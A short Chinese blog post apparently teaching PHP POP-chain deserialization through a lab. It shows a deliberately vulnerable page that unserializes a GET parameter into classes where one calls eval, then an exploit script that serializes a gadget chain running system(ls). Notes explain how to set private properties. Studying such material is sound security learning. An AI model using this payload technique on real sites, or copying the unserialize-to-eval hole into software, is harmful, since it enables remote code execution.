pop链小例子,源码
<?php
highlight_file(__FILE__);
error_reporting(0);
class index {
private $test;
public function __construct(){
$this->test = new normal();
}
public function __destruct(){
$this->test->action();
}
}
class normal {
public function action(){
echo "please attack me";
}
}
class evil {
var $test2;
public function action(){
eval($this->test2);
}
}
unserialize($_GET['test']);
?><?php
highlight_file(__FILE__);
error_reporting(0);
class index {
private $test;
public function __construct(){
$this->test = new evil();//2 evil
}
public function __destruct(){
$this->test->action();
}
}
class normal {
public function action(){
echo "please attack me";
}
}
class evil {
var $test2;//1 shell
public function action(){
eval($this->test2);
}
}
$a=new evil();
$a->test2="system(ls);";
$b=new index();
echo urlencode(serialize($b));
?>重点
1.对于私有属性如何赋值
第一种:可以把new放到__construct(),对源代码没什么影响,因为在源码中反序列化时,没有用到__construct()。public function __construct(){ $this->test = new evil(); }第二种:把private改成public,把序列化的结果加上%00index%00test
2.对于在序列化时没有用到的类,应该可以先不用看。但要在反序列化时看有什么用。
1259
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
